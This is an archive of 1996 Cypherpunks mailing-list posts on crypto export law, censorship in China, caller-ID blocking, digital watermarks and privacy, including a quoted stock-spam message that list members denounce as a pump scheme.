Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <Pine.LNX.3.93.960711224742.174B-100000@smoke.suba.com>
Message-ID: <199607120448.AAA02773@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



snow writes:
> On Wed, 10 Jul 1996, Perry E. Metzger wrote:
> > "Clay Olbon II" writes:
> > > While it is crucial for an adult to be able to function and maintain a jo
b,
> > > is it really as important for a kid to be able to sit still in school?  
> > If he or she is going to learn anything, it is important to be able to
> > pay attention, yes.
> 
> If they were teaching anything, I bet the kid _would_ sit still. 

I doubt it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 12 Jul 1996 21:48:27 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Another bad idea
Message-ID: <199607120517.BAA02703@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Jul 96 at 9:40, Arun Mehta wrote:
[..]
> As  I see it, the Chinese communist government will not live to see more
> than a few years (if any) of the 21st Century. We are all aware of the
> devastating impact of telecommunications, TV and computers on  authoritarian
> regimes.  E.g. in the fall of the Berlin Wall, the Easterners watching West
> German TV was a significant contributory factor.

Some say Hong Kong might be a contributing factor.

> Satellite TV is available all over China.The government may, for a while, be
> able to ban satellite dishes, but soon their size will reduce to that of a

BTW, similar problems in Iran fro what I've heard.  I remember 
hearing a blurb that VOA Chinese Programs explained how to make a 
setellite dish out of aluminum foil, so pick up special VOA 
boradcasts I'm sure... (That's rather intersting, because you can 
crumple it up or wrap leftovers in it immediately.)

[..]
> What that does is give us a window of opportunity. Hongkong has one
> remaining  year of guaranteed unfettered flow of information. China still
> has the Internet. What can we do?

I'm told by some friends that the Chinese, in large part due to the 
writing system, prefer FAXs over the internet.  That's something to 
keep in mind.

Hm... interesting project: a graphics program that works with PGP or 
PGPlib.  One can import scanned images or draw onto the screen and 
then encrypt it for mailing.

Are there any secure FAX protocols that could be worked into 
communications software and standard modems?

 
> 1) Collect the e-mail addresses as Allen suggested (including those in
> Hongkong), and send them a single, short message offering to teach them free
> of cost how to use pgp and all the goodies at
> http://www.eskimo.com/~joelm/cbsw.html

Might be condescending.  'Civilized white man brings PGP to the 
barbarians...'  They may well know about PGP, but not in a position 
to make that knowledge widely known.

And if I were in a 'totalitarian' or restrictive country I'd be damn suspicious,
maybe frightened by this ('are the secret police setting me up?' or 'will the
notice if I reply?').  What if that person like the way their country is?  They 
could inform the local authorities and set in motion a crackdown that 
would not have happened, perhaps.

I'd leave the specifics to activists who are already familiar with 
the respective cultures, societies, politics, etc.... chances are they
are already doing things along those lines.  Otherwise, if you don't 
know what you're doing, you can unintentionally mess up somebody 
else's life, if not your own.

Rob



 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Fri, 12 Jul 1996 21:52:36 +0800
To: cypherpunks@toad.com
Subject: Singapre Sling? FWD "Singapore Unveils Internet Guidelines"
Message-ID: <199607120931.FAA24430@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


>From LI newsday World Briefs, 12 July, p. 21:

"Singapore Unveils Internet Guidelines"

  Singapore unveild steps yesterday to regulate political and 
religious content on the Internet, and keep its cyberspace free of 
pornography.
  According to the Singapore Broadcast Authority, the guidelines, 
effective after July 15, require all operators to register with the 
SBA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Salber <daniel.salber@imag.fr>
Date: Fri, 12 Jul 1996 20:05:15 +0800
To: Arun Mehta <cypherpunks@toad.com
Subject: Re: Minitel "saved" by hackers?
In-Reply-To: <1.5.4.32.19960711023104.002d60f8@giasdl01.vsnl.net.in>
Message-ID: <v03007601ae0b7732218b@[129.88.32.100]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:37 AM +0500 on 7/11/96, Arun Mehta wrote:

> True, but as I understand it, there was also a hacking involved: they took
> the original software, modified it (what I would also call hacking) and made
> it freely available: that is what made the messageries possible. If I'm
> using the technical terminology wrong, thanks for the correction.
>
> I'd love to find out exactly what happened.

This so-called "hijack" happened in Strasbourg on the GRETEL server (which
was sponsored by the local newspaper). "Hacking" is inaccurate: the users
were not necessarily computer-litterate but just found another way to use
the help feature of the server. Rheingold's Virtual Community has a pretty
accurate account of the facts (see chapter 8, also online as
<http://www.well.com/user/hlr/vcbook/vcbook8.html>).

As Minow pointed out, this is not the only case of "hijacking". The
telephone was first intended as a way to listen to remote concerts. Then
users found out they could use it for one-to-one conversations.


In a previous post, you said:

> So, shocked by this, what does the government do? Being unable to
> distinguish between different kinds of messageries, the government put a 30%
> tax in 1989 on all, and raised it to 50% in 1991! No wonder the Internet is
> gaining rapid popularity in France.

I think this is wrong. These taxes were only for sex messageries and the
30% tax didn't actually stop most of them from making money. I think the
50% tax wasn't actually enforced and the tax rate remains at 30% (see
http://www.univ-paris8.fr/~babelweb/voltaire/v_no23.htm -- this is in
french, sorry).

You must realize that the government has no interest in stopping all
messageries: France Telecom is (at least for the coming few months) a
government agency and makes a lot of money from the messageries.

The Internet is not so successful in France mainly because the Minitel is
still widely used and sufficient for most casual uses. Remember France
Telecom kick-started the Minitel by giving away the Minitel terminals.
France Telecom doesn't seem to be willing to give away computers to
kick-start the Internet :-)

You also asked:

> Do you know of any country in Asia or elsewhere favoring the Minitel
> "centralized and bureaucratic" model over the Internet?

The Minitel is no more "centralized and bureaucratic" than the Internet was
only a while ago (ie, when NSF was in charge of most of the core
infrastructure).
The Minitel may look centralized and bureaucratic because anyone who wishes
to open a server has to go through France Telecom (which delivers unique
names like Internic). But the structure is not really centralized: all
traffic goes through the public packet-switching X25 network. Server
operators (there are more than 20,000 of them today) are legally
responsible for the content they serve. It may also look centralized
because there is only one telco in France, but that's another problem.

There were even some experiments of a european Minitel system linking
several european videotex services a few years ago. I think they fell short
because the videotex technology has been so quickly outdated.

Daniel






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sat, 13 Jul 1996 05:18:55 +0800
To: cypherpunks@toad.com
Subject: Reasonable validation of a software package
Message-ID: <199607121405.HAA09514@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Fellow cpunks:

I am working on various software packages for UNIX and
Windows and since this is commercial work and prior NDA's
are involved, I can't include the source code for
absolute validation.

What would assure one that a package has not been tampered
with from the company to the user?

(Currently, I am using PKZIP's rather anemic AV protection,
as well as signing the archive with my PGP key.  I am 
wondering if there are any other steps I need to take to
assure that a package came from me, and wasn't 
damaged/altered/tampered with in transit.)

Thanks in advance.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 13 Jul 1996 01:07:22 +0800
To: chag@moneyworld.com
Subject: Re: Chancellor Group (symbol = CHAG)
In-Reply-To: <199607120153.SAA16483@toad.com>
Message-ID: <Pine.SUN.3.94.960712074337.20933A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jul 1996 chag@moneyworld.com wrote:

> http://chancellor.stockpick.com
> 
> Chancellor Group, Inc. (symbol CHAG) just reported big quarterly earnings.
> SGA Goldstar issued a "buy" recommendation.  I understand other investment
> advisors are looking to recommend CHAG. The company has a strong book value.
> The short sellers need to cover.  This looks like a good situation to me.
> What do you think?  They are located at:

I think you have stock in the company and are looking to boost its value
by using what amounts to the elevator trick.

> 
> 	http://chancellor.stockpick.com
> 
> Bob Williams, 206-269-0846 
> 
> To terminate from my Investment Opportunities, Reply to 
> chag@moneyworld.com with "remove" in the subject field. 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 13 Jul 1996 01:55:53 +0800
To: Daniel Salber <daniel.salber@imag.fr>
Subject: Re: Minitel "saved" by hackers?
Message-ID: <199607121211.IAA25706@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Jul 96 at 5:51, Daniel Salber wrote:
[..]
> As Minow pointed out, this is not the only case of "hijacking". The
> telephone was first intended as a way to listen to remote concerts. Then
> users found out they could use it for one-to-one conversations.

This is innacurate. No, methinks it's wrong.  From every history of 
telephones I have read and heard, it was never that way.

The original conception was of using the telephone for broadcasting. 
It's implementation in most countries was for point-to-point 
communication... it wasn't a matter of the users 'found they could 
use it' (at least not in the US).


Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 13 Jul 1996 01:17:44 +0800
To: cypherpunks@toad.com
Subject: Digital Watermarks for copy protection in recent Billboard magaz
Message-ID: <199607121211.IAA25703@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Paged through a recent (June or July 13) edition of Billboard 
magazine yesterday.  There was an article about the music industry, 
the internet, and copyright issues.  Didn't have a chance to read in 
thoroughly, but it mentioned using digital watermarks which contained 
info on to who (CC number) and when the material was sold... the
watermarks allgedly could survive if a CD was taped, copied several times
and redigitized.

It's rather interesting for several reasons... imagine if every CD 
you owned was tagged with a link to your identity.  So imagine 
getting a used CD or from a garage sale... after several years a 
pirated edition is floating around the internet...

The anti-piracy scheme is only useful for direct sale to a customer 
though.  If you buy music anonymously, how is it traced?  This only 
works for pirating on-demand purchases.

Other issues: what if an eavesdropper steals the music or video? It's 
tagged with your ID.  If he spreads pirated material, you get in 
trouble even though it's not nec. your fault (if no secure 
communications are available, anyway).

If it uses a credit-card number as (part of) an ID, that's pretty 
bad.  Someone can sniff for CC numbers if they know how it's stored.

The system will have to rely on proprietary tech and security through 
obscurity.  Even know how watermarks are stored without understanding 
the math, one must be able to somehow garble the sound without 
distorting it, but which renders the watermark useless.

That a watermark can survive when the music is converted to analog 
and then redigitized is interesting... (if it's saved as inaudible 
tones, what's to prevent one from blurting them out with noise in 
those frequencies?)

Guess I'll have to hunt down that issue and post useful excerpts from 
it...in terms of far use, of course. (Or perhaps an alt-vista 
search...)


Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 13 Jul 1996 03:00:06 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Chancellor Group (symbol = CHAG) (spam)
Message-ID: <199607121257.IAA10837@nrk.com>
MIME-Version: 1.0
Content-Type: text


|Chancellor Group, Inc. (symbol CHAG) just reported big quarterly earnings.

I hear tell "enforcement@sec.gov" is interested in hearing of
such....


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 13 Jul 1996 03:19:20 +0800
To: Daniel Salber <daniel.salber@imag.fr>
Subject: Re: Minitel "saved" by hackers?
Message-ID: <199607121324.JAA26628@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Jul 96 at 14:07, Daniel Salber wrote:
[..]
> Well, sorry if it is. That's what I read in a book about the early history
> of telephone. I don't have the reference handy right now, though.

Understandable.

> BUT: how do you explain that from the original conception (using the
> telephone for broadcasting), the telephone came to be a one-to-one
> communication tool ? Even if the implementation allowed it, someone had to
> think of it, right ?

Bell thought of the idea orig. as a broadcaster.  Then somehow when 
it was set up he or someone else in AT&T did that. If I recall (no 
refs handy) it had to do with the telegraph being (sort of) 
point-to-point...

Bell used to tour the vaudville circuit showing off the telephone. I 
think the idea emerged during that time... during such shows of tech 
(common at the time) there was a Q&A from the audience.

Rob


> 
> Thanks for the clarification anyway.
> 
> Daniel
> 
> 
> 
> 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Sat, 13 Jul 1996 07:01:39 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Destabilizing China's Government with Strong Crypto
In-Reply-To: <ae0b470f030210041fb1@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960712090720.556C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Jul 1996, Timothy C. May wrote:
> 
> I often think the American CIA and NSA are actually just enforcers of the
> status quo, preferring a New World Order of crypto-restricted citizen-units

     I'm suprised you ever think otherwise. 

> to a more diverse, anarchic world in which private citizens and
> corporations can thwart the desires of central governments.



Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 13 Jul 1996 05:06:30 +0800
To: Cypherpunks <amehta@giasdl01.vsnl.net.in>
Subject: Re: Another bad idea
In-Reply-To: <1.5.4.32.19960712093348.002dc774@giasdl01.vsnl.net.in>
Message-ID: <199607121332.JAA32200@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta writes:

: As  I see it, the Chinese communist government will not live to see more
: than a few years (if any) of the 21st Century. We are all aware of the
: devastating impact of telecommunications, TV and computers on  authoritarian
: regimes.  E.g. in the fall of the Berlin Wall, the Easterners watching West
: German TV was a significant contributory factor.
: 
: Satellite TV is available all over China.The government may, for a while, be
: able to ban satellite dishes, but soon their size will reduce to that of a
: wok (might even double as one). The Internet will soon be widespread. The
: real crunch will come when Hongkong becomes part of China. Inevitably, other
: parts of the country will want to know why the special status of Hongkong
: cannot be extended to them. There is a chance that instead of China taking
: over Hongkong, the reverse might happen.
: 
: In cyberspace, the students have the more powerful tanks. Can you imagine
: how different a massacre a la Tiananmen Square would look in a couple of
: years? Images captured on camcorders would be beamed back to the Chinese via
: satellite, all the information would flow both ways on the net, the Hongkong
: stock market would take a dive, ... I would suggest that tacitly or at least
: implicitly, the Chinese goverment has conceded that it will never try a
: major violent suppression of political unrest again. That, or it will decide
: that the Internet is a bad influence, and should be abolished.
: 
: What that does is give us a window of opportunity. Hongkong has one
: remaining  year of guaranteed unfettered flow of information. China still
: has the Internet. What can we do?
: 
: 1) Collect the e-mail addresses as Allen suggested (including those in
: Hongkong), and send them a single, short message offering to teach them free
: of cost how to use pgp and all the goodies at
: http://www.eskimo.com/~joelm/cbsw.html

Unfortunately for those of us in the United States or who are
otherwise subject to its jurisdiction such an offer would require a
license or a waiver of jurisdiction under the International Traffic in
Arms Regulations before it could safely be carried out.  That
particular highly worthwhile project would seem to fall under the
definition of performing defense services as well as involving the
disclosure of technical data relating to an item on the United States
Munitions List.

: . . . . 
:
: Thoughts?

Obscene isn't it?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Sat, 13 Jul 1996 05:08:14 +0800
To: cypherpunks@toad.com (Cypherpunks List)
Subject: Re: DoD and IRS tax systems (fwd)
Message-ID: <199607121338.JAA09574@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm taking the liberty of forwarding this excellent RISKS posting.
There are a couple of other related ones in the latest RISKS digest --
see comp.risks.



-- Jeff

                                 oo
-----------------------------cut /\ here------------------------------

Date: Thu, 27 Jun 1996 14:12:51 -0400
From: Carl Minie <CarlM@qsc1po.qstr.com>
Subject: Re: DoD and IRS tax systems (Wexelblat, RISKS-18.23)

As an ex-liberal and small-l libertarian, I submit that the true danger to
privacy in the Republic is the practice of gathering detailed financial
information from all (law-abiding) Americans under threat of asset
confiscation and jail terms, and then giving tens of thousands of government
employees access to this information in the course of their employment.  I
further submit that passing a few wimpy privacy laws and expecting them to
prevent this information from being used for personal and political purposes
is magical thinking.  It doesn't take a genius to surmise that IRS data is
used regularly for illegal purposes by everyone from the sitting President
(of either party) down to grudge-bearing neighbors and ex-spouses.  I
believe the IRS attempted to assess the depth of the problem in their
Southeastern Region (where my mother worked) at one time, and stopped at
well over 300 violations.  You or I would have ended up at Leavenworth, but
all but a few of the most egregious violators were simply warned not to do
it again.

You can take voluntary action to keep yourself out of the TRW/
Equifax/TransUnion food chain and off junk mail lists...but Federal law
requires you to remain in the IRS's gunsights for your entire productive
lifespan.  Neither party supports privacy when it means privacy from the
government; it is a Democratic president who is enthusiastically supporting
the FBI and NSA in their efforts to prevent American citizens from using
encryption that they can't break, and to require that every phone, fax, and
modem in the United States contain a chip that would allow government
agencies to tap in at will.  Do I need to add here that the very concept of
economic privacy is anathema to those who believe that a portion of
everything you earn, keep, spend, or invest belongs to them, and that not
handing over the fraction they demand is stealing from them?

> Is the Department of Star Wars and the $700 toilet seat
> really so excellent a contracting agency that they are the
> clear choice to handle IRS business?

I don't expect the IRS to be abolished anytime soon...but letting the DoD
design its computer systems would be an acceptable second choice.  The DoD
may be expensive, but they're not very good.  My fondest hope is that with a
spanking new Government Issue computer system, the IRS that the GSA says
can't figure out where 60% of its own budget goes won't be able to find 60%
of mine.  I don't like paying for $700 toilet seats (or $320,000 spotted
owls) any more than you do.

The solution which provides the smallest RISK to privacy is not to gather
the data in the first place.  If tax compliance is truly voluntary, then the
IRS should trust that we are reading 21,000 pages of IRS rules and case law
and sending in the correct amount.

Long Pig

------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Fri, 12 Jul 1996 23:19:43 +0800
To: "Deranged Mutant" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Another bad idea
Message-ID: <1.5.4.32.19960712093348.002dc774@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 05:06 10/07/96 +0000, Deranged Mutant wrote:
>On  9 Jul 96 at 18:26, E. ALLEN SMITH wrote:
>[..]
>> 	Like China, various other countries are trying to get the Internet's
>> benefits (such as technical information) without its other consequences
>> (extension of civil liberties into countries that want to deny them). One
idea
>> that I've had for preventing such problems is to look for addresses from such
>> countries that are posting to technical newsgroups, to technical mailing
lists,
>> or that are attempting to get access to web pages on technical subjects
(which
>> access they will hopefully be denied, although an alternate possibility).
Then
>> mail information to those addresses that those countries don't want getting
>> into their countries, such as on human rights abuses (or well-written
>> pornography...).
>
>Great idea. Get some (possibly) innocent techie in an oppressive 
>country thrown in jail or executed.
>[..]
>Damn aggrevating for that user, and it could get him/her in trouble.
>
>On a wide-scale it could provoke responses from those countries.  

Damned right, and it should. Your religion teaches to "DO UNTO OTHERS AS YOU
WOULD HAVE THEM DO UNTO YOU." Good advice for anyone on the Internet, and
the last thing you want to teach newbies is to spam.

Imagine if you were to send the cypherpunks list unsolicited porn, info
about some prisoner in Texas who is getting the death penalty... you get the
picture. If I were at the receiving end, I'd send back a polite but firm
note asking you to desist, and if you didn't, complain to your sysop, or
remailer operator. Which is what you would do in my shoes.

But if you want to do something, I have a better idea (thanks for the
willingness to help):

As  I see it, the Chinese communist government will not live to see more
than a few years (if any) of the 21st Century. We are all aware of the
devastating impact of telecommunications, TV and computers on  authoritarian
regimes.  E.g. in the fall of the Berlin Wall, the Easterners watching West
German TV was a significant contributory factor.

Satellite TV is available all over China.The government may, for a while, be
able to ban satellite dishes, but soon their size will reduce to that of a
wok (might even double as one). The Internet will soon be widespread. The
real crunch will come when Hongkong becomes part of China. Inevitably, other
parts of the country will want to know why the special status of Hongkong
cannot be extended to them. There is a chance that instead of China taking
over Hongkong, the reverse might happen.

In cyberspace, the students have the more powerful tanks. Can you imagine
how different a massacre a la Tiananmen Square would look in a couple of
years? Images captured on camcorders would be beamed back to the Chinese via
satellite, all the information would flow both ways on the net, the Hongkong
stock market would take a dive, ... I would suggest that tacitly or at least
implicitly, the Chinese goverment has conceded that it will never try a
major violent suppression of political unrest again. That, or it will decide
that the Internet is a bad influence, and should be abolished.

What that does is give us a window of opportunity. Hongkong has one
remaining  year of guaranteed unfettered flow of information. China still
has the Internet. What can we do?

1) Collect the e-mail addresses as Allen suggested (including those in
Hongkong), and send them a single, short message offering to teach them free
of cost how to use pgp and all the goodies at
http://www.eskimo.com/~joelm/cbsw.html

2) Encourage the production of simple, cheap devices such as a PGP phone
that they can manufacture in Hongkong and other parts of China, which will
allow secure communications. Basically, people without a computer, Internet
connection or sufficient literacy should be able to use effective
encryption. Cheap.

3) Find people who beam radio transmissions into China (Rupert Murdoch via
his Star TV satellite is one ;-) and ask them to devote an "Internet hour"
in which people can mail or phone in messages (via remailers and encryption
too) to be broadcast. The whole thing can be automated, and  *everybody* has
access to radio. More on this subject later.

Thoughts?

Arun Mehta, B-69 Lajpat Nagar-I, New Delhi-24, India. Phone 6841172,6849103
amehta@doe.ernet.in amehta@giasdl01.vsnl.net.in amehta@cerfnet.com
http://mahavir.doe.ernet.in/~pinaward/arun.htm
"I do not want my house to be walled in on all sides and my windows to be 
stuffed. I want the cultures of all the lands to be blown about my house 
as freely as possible. But I refuse to be blown off my feet by any."--Gandhi








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abacard@well.com
Date: Sat, 13 Jul 1996 10:43:23 +0800
To: cypherpunks@toad.com
Subject: Needed: Bay Area "Cracker" for TV Show
Message-ID: <199607121640.JAA11127@well.com>
MIME-Version: 1.0
Content-Type: text/plain


 
July 11th, a San Francisco television reporter called me. He wants to
broadcast a story about "crackers". He'd like someone who can describe,
on-the-air, examples of what crackers can do. In particular, he'd like
someone who can provide a demonstration.
 
Do you want to be on Bay Area TV? If not, whom in the Bay Area do you
recommend? This could be a chance for you to publicize your favorite
security flaws in voice box systems, or whatever.
 
The reporter wants to run this story during the week of July 15th. If
interested, please contact me as soon as possible. The reporter uses
telephones, not e-mail, so I'll need your phone number. Thanks.
 
See you in the future,
Andre Bacard
======================================================================
abacard@well.com                    Bacard wrote "The Computer Privacy
Stanford, California                Handbook" [Intro by Mitchell Kapor].
"Playboy" Interview (See Below)     Published by Peachpit Press, (800)
http://www.well.com/user/abacard    283-9444, ISBN # 1-56609-171-3.
=======================================================================
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 13 Jul 1996 09:08:47 +0800
To: lwp@conch.aa.msen.com (Lou Poppler)
Subject: spam suckers (was Re: Chancellor Group....)
In-Reply-To: <Pine.BSI.3.92.960712102908.25048B-100000@conch.aa.msen.com>
Message-ID: <199607121652.JAA28494@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Lou Poppler writes:
> 
> Note that the referenced web server is in another domain owned by this
> same Bob Williams.  Perhaps his misleading unsolicited investment advice
> is part of a package deal provided to companies who buy his web service.


He's been flogging the same shit for a while- I've received three or four
of these spams at another address that I use to make Usenet posts.

That address is an account at a large workstation company that I
consult for.  I've been getting a lot of spam there.
I suggested on an internal mailing list that the amount of spam
that various employees there are getting isn't insignificant and
that perhaps they should sue some of the spammers for wasting
the company's resources and employee time without permission.

I suggest that the "anti-junk-fax" law might be extended to cover
spam mail.  However I don't trust net-clueless legislators to
be able to make even a simple law without fucking it up and
restricting civil liberties.  However, I heard from a friend
that they're doing just that, extending the junk fax law
to cover junk email.  Something like a $500 fine for
each junk email.  Does anyone know more?

Would mailing-list operators be liable under this law when
someone forges a subscription message from "clinton@whitehouse.gov"?


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 13 Jul 1996 10:26:02 +0800
To: Arun Mehta <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Another bad idea
Message-ID: <2.2.32.19960712172300.00b332cc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:40 AM 7/12/96 +0500, Arun Mehta wrote:

>What that does is give us a window of opportunity. Hongkong has one
>remaining  year of guaranteed unfettered flow of information. China still
>has the Internet. What can we do?

{good ideas snipped]

Another thing to do is get more web sites containing information of interest
to people living in such regimes on SSL enabled web servers.  If the web
redirectors can be set to redirect SSL traffic undisturbed, then there is
another level of encryption for the chinese to have to hack through to find
"dissidents".  And if someone could sneak them a few copies (hint...
hint...) of the 128 bit version, it would make their lives even more difficult.

I see a point where the repressive regimes of the world are going to be
trying to prevent their people from getting to information that is against
the regime, but getting run over by the shear volume of the information.  It
may be possible to filter for such things, but in doing so, you destroy any
usefulness the network has in the first place.

Of course this is all a moot point, because it has been proven by computer
projections that all informative net traffic will be buried under
advertisements by the year 2000 anyways.  I expect some legislative body to
try and make money fast on the net by selling ad space on IP packet headers.
("This packet sponsored by Preparation H!")

I think I will go drink more coffee now...

---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@conch.aa.msen.com>
Date: Sat, 13 Jul 1996 05:39:41 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Chancellor Group (symbol = CHAG)
In-Reply-To: <Pine.SUN.3.94.960712074337.20933A-100000@polaris>
Message-ID: <Pine.BSI.3.92.960712102908.25048B-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Note that the referenced web server is in another domain owned by this
same Bob Williams.  Perhaps his misleading unsolicited investment advice
is part of a package deal provided to companies who buy his web service.

On Fri, 12 Jul 1996, Black Unicorn wrote:

> On Thu, 11 Jul 1996 chag@moneyworld.com wrote:
>
> > http://chancellor.stockpick.com
>
> I think you have stock in the company and are looking to boost its value
> by using what amounts to the elevator trick.
>
> >
> > 	http://chancellor.stockpick.com
> >
> > Bob Williams, 206-269-0846
> >





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 13 Jul 1996 09:59:41 +0800
To: dm@amsterdam.lcs.mit.edu (David Mazieres)
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
Message-ID: <199607121854.LAA29560@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


David Mazieres writes:
> 
> My last phone bill said that Nynex is now giving out people's names in
> addidtion to their phone numbers over caller-id.  I therefore called
> Nynex and told them to block caller-id on my phone line.
> 
> They said no problem, but...  They said nothing I can do will block it
> when I call 800 numbers.  "The people with 800 numbers have special
> software, and there is nothing you can do to block your identity when
> calling them.  Not even *67."

Same in Pacific Bell land.  We get two options- "partial blocking"
which really means tht you have to use *67 to block CID to
non-800/900 numbers, and "complete blocking" which blocks CID
to non-800/900 numbers.

When I called the Pac Bell customer service droids to get my "complete"
blocking I asked them why they won't block CID to 800 numbers.
Their answer: "that's just the way it works". 


> Wow.  Maybe I'm not paranoid enough, but I never expected this.  I can
> never again call an 800 number anonymously to get information about
> something unless I go out to a pay phone.  What an incredible
> inconvenience, and how truly depressing.

Caller ID isn't for people, it's for businesses who want to
track callers.  They're willing to pay for that service, enough
to make it worth the while of the phone companies to spend many
millions on a campaign of lies (excuse me, "PR") to convince us
that we need CID for "safety".

 

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Sat, 13 Jul 1996 08:26:44 +0800
To: cypherpunks@toad.com
Subject: Can't block caller ID in Massachusetts?
Message-ID: <199607121555.LAA19993@extreme-discipline.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


My last phone bill said that Nynex is now giving out people's names in
addidtion to their phone numbers over caller-id.  I therefore called
Nynex and told them to block caller-id on my phone line.

They said no problem, but...  They said nothing I can do will block it
when I call 800 numbers.  "The people with 800 numbers have special
software, and there is nothing you can do to block your identity when
calling them.  Not even *67."

